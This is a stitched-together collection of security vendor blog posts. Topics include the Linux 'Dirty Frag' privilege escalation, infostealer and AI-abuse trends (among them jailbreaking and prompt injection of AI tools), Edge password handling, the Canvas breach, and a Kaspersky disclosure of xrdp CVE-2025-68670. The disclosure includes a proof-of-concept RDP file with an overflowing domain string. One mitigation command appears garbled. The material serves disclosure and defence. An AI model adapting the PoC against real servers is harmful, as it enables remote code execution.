Since this vulnerability requires no authentication and targets exposed Server Function endpoints directly, exploitation is straightforward in unpatched environments. Organizations using React Server Components, Next.js App Router, or related server-side rendering frameworks should immediately upgrade affected packages and review exposed application endpoints.
Imperva Cloud WAF and On-Prem WAF customers are protected against related attack activity.
Inside the 2026 Cyber Threat Landscape: Data-Driven Security Priorities
In Flashpointβs recent webinar, we examine the defining shifts shaping the 2026 threat landscape, from AI-driven attack automation to the growing role of identity in initial access. We analyze how infostealers, vulnerabilities, and ransomware activity are evolving, and where security teams should focus now.
In 2026, the threat landscape operates as a single, connected system. Identity, malware, and infrastructure are now part of the same attack chain, executed at a speed that compresses the time between access and impact.
What once required multiple stages and specialized tooling is now streamlined and automated.
Flashpoint recently hosted an on-demand webinar, βInside the 2026 Cyber Threat Landscape: Data-Driven Security Priorities,β where our intelligence team broke down the trends driving this shift. Drawing from primary source intelligence across forums, marketplaces, and closed communities, the session examined how modern attack chains are forming and evolving, as well as where defenders still have opportunities to intervene.
Here are the key takeaways you need to know to prioritize threats and protect your organization.
AI Is Being Operationalized Across the Attack Lifecycle
Flashpoint tracked more than 1.5 billion mentions of AI in illicit communities in 2025, with activity accelerating sharply toward the end of the year. These discussions center on how AI can be applied to real operations, including phishing, malware development, and fraud.
As Ian Gray, Vice President of Intelligence at Flashpoint, noted during the session, βAdversaries are extremely adept, and theyβre constantly looking at how they can use the newest state-of-the-art toolsβwhether thatβs commercial models or their own implementationsβand how they can jailbreak them or adapt them to their workflows.β
One of the most notable developments is the use of agentic AI systems to automate tasks that were previously manual. These systems are being used to:
Test stolen credentials across VPNs, SaaS platforms, and cloud environments
Rotate infrastructure during active operations
Generate and refine attack inputs based on previous outcomes
Alongside this, threat actors are actively exploring ways to bypass safeguards in commercial AI tools, including:
Jailbreaking model restrictions
Embedding hidden instructions through prompt injection
Manipulating AI-powered features within enterprise applications
This activity reflects a sustained effort to integrate AI directly into attack execution rather than treating it as a standalone capability.
Identity Is Driving Initial Access
The fundamental mechanics of cybercrime have shifted from breaking in to logging in, as attackers leverage stolen session cookies to behave like legitimate users.
As Gray explained, βThreat actors are finding a variety of ways to get into enterprise networks, and typically itβs through the human element. While humans can be trained or educated, itβs not something that can be patched in the traditional sense.β
This dynamic is already visible at scale.
Flashpoint observed 11.1 million infected devices and 3.3 billion stolen credentials in 2025. These credentials are extracted through infostealers and circulated across marketplaces, enabling direct access into enterprise environments.
In many cases, attackers are using:
Session cookies and tokens to bypass authentication flows
Browser fingerprints and system metadata to replicate legitimate user behavior
Valid credentials to access SaaS platforms, VPNs, and internal systems
Once access is established, activity often blends into normal user behavior, making detection more difficult. Compromised identities are also reused across multiple services, expanding the scope of potential exposure.
This pattern continues to appear in intrusion activity tied to SaaS platforms and third-party integrations, where access to one system can provide visibility into multiple environments.
Infostealers Are Enabling Scalable Access
Infostealers remain a primary driver of credential exposure.
Logs containing credentials, cookies, and system data are continuously harvested and made available through criminal marketplaces and subscription-based services. These logs are used directly or integrated into automated workflows that test and validate access at scale.
Gray pointed to how this plays out in practice: βInfostealers have really commoditized access. They harvest credentials, identify which ones are useful, and then test them at scale across VPNs, SaaS platforms, and cloud environments.β
The ecosystem continues to shift as law enforcement activity disrupts established players and new variants gain traction. Families such as Vidar, Lumma, and others maintain a strong presence due to accessibility and ongoing development.
In parallel, credential harvesting is feeding downstream activity, including:
Account takeover
Fraud operations
Data exfiltration and extortion
This linkage between initial access and follow-on activity is consistent across multiple reporting streams.
Vulnerability Exploitation Is Moving Faster
Vulnerability volume continues to increase alongside exploitation speed.
Flashpoint recorded more than 44,000 disclosed vulnerabilities in 2025, with over 14,000 tied to publicly available exploits. In several cases, exploitation activity followed disclosure within a day.
As Gray put it, βWith vulnerabilities, it can feel like youβre trying to boil the ocean. Thereβs such a high volume of disclosures, but in reality, thereβs a smaller setβthose that are remotely exploitable, have proof-of-concept code, and are being actively usedβthat you need to focus on.β
Attacker focus is concentrated in areas that provide broad access or downstream impact, including:
Software supply chains and CI/CD environments
Open-source dependencies
Widely used enterprise platforms
Given the volume of disclosures, prioritization remains critical. Vulnerabilities that are remotely exploitable and paired with public exploit code present immediate risk, particularly when active discussion or exploitation is observed.
Ransomware Activity Continues to Shift
Ransomware activity increased by 53%, with continued changes in how operations are carried out.
Gray framed the shift this way: βWhy even bother to develop ransomware? That takes time, resources, and overheadβwhen you can gain access through a compromised account or third-party platform and immediately move to extortion.β
In addition to traditional ransomware deployment, there is sustained activity centered on:
Data exfiltration followed by extortion
Use of compromised credentials for direct access
Targeting of third-party providers and SaaS platforms
Intrusions tied to help desks, identity workflows, and federated applications continue to appear in reporting, often involving social engineering or unauthorized access provisioning.
There is also ongoing activity related to insider recruitment, with threat actors seeking individuals who can provide direct access or privileged information.
Industries with higher operational dependencies, including manufacturing, technology, and healthcare, continue to be targeted due to the potential impact of disruption.
Translating Intelligence Into Action
The trends shaping 2026 are grounded in how attackers are currently operating across multiple domains.
As Gray emphasized, βYou have to take into account vulnerabilities, exposures, infostealers, and identity compromise all at the same time. These arenβt separate problems anymoreβtheyβre all part of the same attack chain.β
Security teams should focus on:
Identifying exposures with a high likelihood of exploitation
Monitoring for compromised credentials tied to organizational domains
Reviewing identity access and third-party integrations
Prioritizing vulnerabilities with active exploit availability
Tracking attacker activity across forums, marketplaces, and communication channels
These actions align with observed attacker behavior and provide a clearer path to prioritization.
Watch the Full Webinar and Explore the Data
The trends shaping 2026 are grounded in how attackers are already operating.
Flashpointβs full webinar provides a deeper look at the data, along with practical guidance on how to translate intelligence into action.
A newly disclosed Linux local privilege escalation vulnerability known as βDirty Fragβ enables escalation from an unprivileged user to root through vulnerable kernel networking and memory-fragment handling components, including esp4, esp6 (CVE-2026-43284), and rxrpc (CVE-2026-43500). Public reporting and proof-of-concept activity indicate the exploit is designed to provide more reliable privilege escalation than traditional race-condition-dependent Linux local privilege escalation techniques.
Dirty Frag may be leveraged after initial compromise through SSH access, web-shell execution, container escape, or compromise of a low-privileged account. Affected environments may include Ubuntu, RHEL, CentOS Stream, AlmaLinux, Fedora, openSUSE, and OpenShift deployments. Microsoft Defender is actively monitoring related activity and investigating additional detections and protections.
This article details an ongoing investigation into active campaign. We will update this report as new details emerge.
Why Dirty Frag matters
Local privilege escalation vulnerabilities are frequently used by threat actors after initial access to expand control over a compromised environment. Once root access is obtained, attackers can disable security tooling, access sensitive credentials, tamper with logs, pivot laterally, and establish persistent access.
Dirty Frag is notable because it introduces multiple kernel attack paths involving rxrpc and esp/xfrm networking components to improve exploitation reliability. Rather than relying on narrow timing windows or unstable corruption conditions often associated with Linux local privilege escalation exploits, Dirty Frag appears designed to increase consistency across vulnerable environments.
This increases operational risk in environments where threat actors already possess limited local execution capability through compromised accounts, vulnerable applications, containers, or exposed administrative interfaces.
Technical overview
Dirty Frag abuses Linux kernel networking and memory-fragment handling behavior involving esp4, esp6, and rxrpc components. Similar to the previously disclosed CopyFail vulnerability (CVE-2026-31431), the exploit attempts to manipulate Linux page cache behavior to achieve privilege escalation. However, Dirty Frag introduces additional attack paths that expand exploitation opportunities and improve reliability.
The vulnerability affects systems where vulnerable modules are present and accessible. In many enterprise environments, these components may already be enabled to support IPsec, VPN functionality, or other networking workloads.
Exploitation scenarios
Threat actors may leverage Dirty Frag after obtaining local code execution through several common intrusion paths, including:
Compromised SSH accounts
Web-shell access on internet-facing applications
Container escapes into the host environment
Abuse of low-privileged service accounts
Post-exploitation activity following phishing or remote access compromise
Once local access is established, successful exploitation may allow attackers to escalate privileges to root and gain broad control over the affected Linux host.
Limited In-The-Wild Exploitation
Microsoft Defender is currently seeing limited in-the-wild activity where privilege escalation involving βsuβ is observed, and which may be indicative of techniques associated with either βDirty Fragβ or βCopy Failβ.
The campaign shows a sequential attack timeline where an external connection gains SSH access and spawns an interactive shell, followed by staging and execution of an ELF binary (./update) that immediately triggers a privilege escalation via βsuβ.
After gaining elevated access, the actor modifies a GLPI LDAP authentication file (evidenced by a .swp file from vim), performs reconnaissance of the GLPI directory and system configuration, and inspects an exploit artifact. The activity then shifts to accessing sensitive data and interacting with PHP session files β first deleting multiple session files and then forcefully wiping additional ones β before reading remaining session data, indicating both disruption of active sessions and access to session contents.
Mitigation guidance
The Linux Kernel Organization released patches, which are linked at theΒ National Vulnerability DatabaseΒ (NVD), to fix CVE-2026-43284 on May 8, 2026. Customers who have not applied these patches are urged to do so as soon as possible. As of May 8, 2026, patches for CVE-2026-43500 are not available. CVE-2026-43500 is reportedly reserved for the RxRPC issue but is not yet published in NVD.
While comprehensive remediation guidance continues to evolve, organizations should evaluate interim mitigations immediately.
Recommended actions include:
Disable unused rxrpc kernel modules where operationally possible
Assess whether esp4, esp6, and related xfrm/IPsec functionality can be temporarily disabled safely
Restrict unnecessary local shell access
Harden containerized workloads
Increase monitoring for abnormal privilege escalation activity
Prioritize kernel patch deployment once vendor advisories are released
The following example prevents vulnerable modules from loading and unloads active modules where possible:
cat /dev/null
These mitigations should be carefully evaluated before deployment, particularly in environments relying on IPsec VPNs or RxRPC functionality.
Post-mitigation integrity verification
Mitigation alone may not reverse changes already introduced through successful exploitation attempts.
If exploitation occurred prior to mitigation, malicious modifications may persist in memory or cached file content even after vulnerable modules are disabled. Organizations should validate the integrity of critical files and assess whether cache clearing is appropriate for their environment.
echo 3 | sudo tee /proc/sys/vm/drop_caches
Cache clearing can temporarily increase disk I/O and impact production performance and should be evaluated carefully before deployment.
Microsoft Defender coverage
Microsoft Defender XDR customers can refer to theΒ followingΒ list of applicable detections below that provides coverage for behaviors surrounding βDirty Flagβ exploitation.
Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.Β
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.Β
Microsoft Defender Vulnerability Management β Microsoft Defender Vulnerability Management surfaces devices vulnerable to βDirty Fragβ which are linked to the following CVEs: CVE-2026-43284 CVE-2026-43500
Microsoft Defender Threat Intelligence
Microsoft Defender Threat Intelligence published a threat analytics article and a vulnerability profile for this vulnerability
To put it simply, the classic logic of a SIEM system works as follows: if event A occurs, followed by event B, this may be a sign of an attack, and an information security specialist should be notified. But in todayβs environment, this simple scenario is increasingly failing. Just recently, our experts analyzed a high-profile incident: attackers compromised the update infrastructure of the popular Notepad++ software, and distributed malware via the update mechanism. Itβs simply impossible to have rules in place in advance that are specifically designed to counter such scenarios.
The attacks themselves have become more sophisticated: attackers use legitimate tools, they attack through the supply chain by compromising software outside the corporate perimeter, stretch out their scenarios over time, and disguise their actions as normal activity. In other words, they do not βbreak intoβ the infrastructure; more often than not, they log in and use legitimate software. As a result, the classic fixed rules of the past either fail to trigger, or generate too many false alerts. This is what prompted the shift toward more flexible correlation scenarios.
Dynamically updated SIEM content
Correlation content today isnβt a static set of rules, but a process: itβs constantly evolving and adapting to current threats. In 2025 alone, we released 55 rule-package updates for different versions and languages of our Kaspersky SIEM system. In just one year, we added 10 new rule packs, as well as 250 detection rules and numerous improvements to existing content. This year, weβve already added 43 new rules and refined another 63. In total, this amounts to over 850 rules covering a significant portion of the MITRE ATT&CK framework.
Kaspersky SIEM rules are written based on insights from our experts who analyze real-world, recent attacks: we primarily draw on the findings of our managed detection and response (MDR) service and our threat research. As a result, our rules cover scenarios β from reconnaissance to privilege escalation β that involve the latest approaches used by attackers. For example, we detect the use of new attack techniques such as ToolShell.
In addition to scheduled updates, the team regularly releases so-called emergency content β rule sets for rapid response to new and unexpected attack techniques. In February, for example, detection rules were released for authentication bypass in Fortinet products via the SSO mechanism: attackers used specially crafted SAML requests to gain access to systems without credentials.
From events to attack chains
Moreover, modern SIEM rules no longer describe individual events, but rather sequences of actions. Scenarios are built around the stages of an attack: from initial access, to privilege escalation and persistence. Kaspersky SIEMβs effectiveness is enhanced through integration with Kaspersky EDR and dedicated rule sets for Active Directory, which implement dozens of attack detection scenarios at various stages. This approach allows us to see not just individual signals, but the full picture.
Integration and internal visibility
Another way to improve the effectiveness of an SIEM system is to expand data sources. A classic SIEM aggregates events from different levels of the infrastructure: from logs to telemetry from endpoints and internal systems. In addition to this, our SIEM system includes specialized rule sets for our other solutions (Kaspersky Security Center, Kaspersky Security for Mail Groups, K Anti-Targeted Attack platform), which allow monitoring of administrator actions, authentication, and service status. As a result, the system becomes a tool not only for detecting attacks, but also for monitoring internal activity.
Β
Overall, SIEM is no longer just a set of rules, but has evolved into a continuously updated detection system. Its effectiveness is determined not by the number of detections, but by their relevance, coherence, and how accurately they reflect the actual actions of attackers. Stay up to date regarding our Kaspersky Unified Monitoring and Analysis Platform (SIEM) on its official product page.
Fortinet introduces the FortiExtender WAN 50G, an ultra-high-performance 5G gateway that extends FortiGate connectivity with secure, resilient wireless WAN and integrated management through FortiOS.
In that article we mentioned the importance of encryption.
βWith a browser password manager, someone with access to your browser could see your passwords in clear text, although Windows can be set to ask forΒ authenticationΒ (the same you use at startup of your device).β
The typical behavior of browser password managers is to store passwords encrypted on disk, tied to your user account, and protected by the operating system.
But recently, a security researcher systematically tested every major Chromium-based browser for how they handle credentials in memory. The researcher found that Edge was the only one loading the entire password vault into plaintext process memory at startup, where it remains for the duration of the session. Β
Chrome and other Chromium browsers were observed to only decrypt a password when needed (autofill or βshow passwordβ), not the whole vault, and to use mechanisms like appβbound encryption for keys. Edge does not use those protections in this context.
So, the researcher decided to write a proof-of-concept (PoC) demonstrating that accessing that vault doesnβt rely on zero-days or complex exploitation. It relies on the relatively simple ability to read process memory, which does require elevated privileges.
But when the researcher reported the issue to Microsoft, the response was underwhelming. The companyβs official response was that the behavior is βby design.β The reasoning most likely is that this behavior speeds up signβin and autofill, and attackers would already need a compromised machine or elevated access to read RAM, which Microsoft treats as out of scope for this design decision.
Which is basically true. An attacker already needs significant foothold: for example, code execution on the box and the ability to read Edgeβs process memory, often requiring elevated privileges.Β This is not a remote, unauthenticated bug in the browser, but the design makes postβcompromise credential harvesting easier. And itβs a capability many infostealers already have.
Itβs just another thing an attacker can do once theyβve compromised your machine. Combined with this academic study from 2024, which found many password managers leak plaintext passwords into memory under some conditions, it leads us to repeat our advice.
Should you allow your browser to remember your passwords?
Your browser password manager gives you ease of use, but that costs you some security. Of course, password managers arenβt foolproof either, so itβs important to decide for yourself where you store your passwords.
If youβre confident the website is safe, and anyone that can access it under your account wonβt learn anything new, feel free to store the password in your browser, but disable autofill so you stay in control.
UseΒ MFA where possible. It enormously reduces the risk should someone get hold of your password. And refrain from using the browser password manager to store your credit card details or other sensitive personally identifiable information, such as medical information.
But weβd add that, among the major browsers, EdgeΒ appears to be the weakest option if you still choose to use a builtβin password manager.
Stop threats before they can do any harm.
Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser β
Days after confirming a major data breach, Instructure is now facing a second blow.
Earlier this week, Instructure confirmed a major data breach affecting its cloudβhosted Canvas environment, with the ShinyHunters group claiming it stole hundreds of millions of records tied to thousands of schools and universities worldwide. As discussed in our earlier blog, that incident involved data such as student and staff records, enrollment details, and private messages allegedly accessed through Canvas export features and APIs. At that stage, the focus was on largeβscale data theft and the longβterm risks for affected students and families, including identity fraud and highly targeted phishing.
According to new reporting, ShinyHunters has now hit Instructure again, this time moving from quiet data theft to very visible extortion. Using another vulnerability in Instructureβs systems, the attackers were able to modify Canvas login portals for hundreds of educational institutions, defacing both web logins and the Canvas app with an onβscreen ransom message.
The message both claimed responsibility for the earlier breach and set a deadline of May 12 for Instructure and affected schools to contact the gang or risk the public release of stolen data.
This second wave matters for two reasons. First, it confirms that ShinyHunters still has meaningful access to Instructureβs environment, or at least to components that control the look and behavior of school login pages. Second, it marks a clear escalation in pressure tactics, from leaked claims and dark web posts to messages shown directly to students, parents, and staff trying to access their courses.
How to deal with this data breach
For students and families, the practical advice from our original blog still applies:
Reset Canvasβrelated passwords
Enable multiβfactor authentication where possible
Monitor financial and credit activity as children get older
Stay wary of highly personalized phishing that references real schools, courses, or teachers
For schools and districts, this latest extortion campaign underlines the need to coordinate closely with Instructure, review single sign-on (SSO) integrations, and prepare clear communications so that any future defacements or data leaks do not catch staff and parents by surprise.
βOne of theΒ bestΒ cybersecurityΒ suites on theΒ planet.βΒ
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session β all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) // [3]
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;
// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}
while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) // [4]
{
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}
v n -= u8len;
v += u8len;
}
else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}
r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; // [5]
}
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.
CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; // [7]
[..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, // [6]
combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, letβs look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];
/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') // [8]
{
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); // [9]
if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); // [10]
}
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain nameΒ β starting from the second character and ending with the double underscore (β__β)Β β is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if itβs technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attackerβs intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).
To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial β_β and the subsequent β__β. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP serverβs IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string βAAAAAAAAβ. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gefβ€ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()
Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.
The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
12/05/2025: we submitted the vulnerability report via https://github.com/neutrinolabs/xrdp/security.
12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
12/15/2025: investigation and prioritization of the vulnerability began.
12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
01/27/2026: the patch was merged into the projectβs main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutionsΒ β such as Kaspersky Thin Client and Kaspersky IoT Secure GatewayΒ β led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.
However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
Thereβs a certain energy you can only find at Recorded Future. Take that energy and bring it to Londonβs βSilicon Roundaboutβ and you get the perfect spot for Futurists to build and innovate.
Across the globe, Recorded Future is 1000+ employees working towards the same mission: Securing Our World With Intelligence.
Our London office β one of our most storied hubs β hosts a range of departments supporting both local, regional, and global operations. The office brings together 100+ cross-functional professionals from People & Talent Acquisition, Finance, Sales, Marketing, Global Services, Research, and more!
Looking back: From the Attic to The Bower
Our story in London didnβt start in the high-rise, but in a converted attic with just a handful of people and a big mission.
When I first joined, we were in the attic of a 3-story building.It was full of great people and energy; the immediate feeling I got was that everyone was building something great together.β
Joe Rooke
Director Risk Insights, Insikt Group
This passion for building something great fueled incredible growth. Sam Pullen, Director of Intelligence Services, remembers when the entire EMEA team was just about 20 people. Since 2018, weβve gone from service a few dozen customers in the region to ~700 now.
On the left: First Recorded Future office in London. On the right: Recorded Future's newest office
On the left: First Recorded Future office in London. On the right: Recorded Future's newest office
Inside the Office
This modern high-rise buildingβs open-plan layout offers quite a few collaboration spaces across our office, where the team likes to have small team meetings, breaks, or even lunch.
Like all Recorded Future offices, our meeting rooms follow a unique naming convention. While Boston uses countries, and Sweden volcanoes - London chose islands. Rumors say we picked islands following a 95-day rain streak β we can neither confirm nor deny. So, in our London office, youβll find Futurists collaborating in rooms like Bora Bora, Crete, and even San Andres.
Our Culture
What truly defines our London office is the sense of camaraderie β whether thatβs competing in a friendly team padel game, testing your dartboard skills, or truly memorable summer & end of year celebrations.
The culture at the London office has always been welcoming and inclusive. The BDRs are the soul of the office, and you can always rely on them for a good conversation over a cup of tea.
Sam Pullen
Whether over summer picnics and pedalos in Hyde Park years, playing 5-a-side football in the pouring rain, or at the most recent Christmas party at the Savoy - our Futurists celebrate wins together.
Friendly Team Padel Game at Canary Wharf
Onwards & Upwards: Why Recorded Future
We asked Sam and Joe what has been the highlight of their long tenure at Recorded Future: the opportunity to build. For Sam, it has been the opportunity to build great relationships with clients over nearly a decade. For Joe, it has been the opportunity to build new solutions and new ways to work towards our mission.
The company offers opportunities to builders. If you are willing to take the initiative to make something better, you are not stopped. That is rare.
Cybersecurity is a cornerstone of our modern world, but its roots stretch back long before the internet. Far from a recent phenomenon, the field began in university labs and evolved through decades of innovation and conflict. For professionals and everyday users alike, tracing this history reveals why today's defenses exist and why vigilance remains our most critical tool.
The 1940s: Theoretical Seeds and Massive Machines
Long before the first hack, pioneers were already contemplating the risks of digital intelligence. In 1945, the Electronic Numerical Integrator and Computer (ENIAC) - the first general-purpose electronic computer - showcased the power of computing, though it was a room-sized giant reserved for military use. While the idea of a "cybercriminal" was still science fiction, the theoretical groundwork for future threats was being laid.
Mathematician John von Neumann began developing his "Theory of Self-Reproducing Automata" during this era. He proposed that a machine-based organism could replicate itself across systems - the conceptual birth of the computer virus.
Key Characteristics of This Era:
Physical Isolation: Security meant locking the door to a room-sized machine.
Government Monopoly: Computers were exclusive to the military and the academic elite.
Conceptual Threats: Risks were purely mathematical theories rather than practical realities.
The Virus Blueprint: The foundational logic for self-replicating code was established.
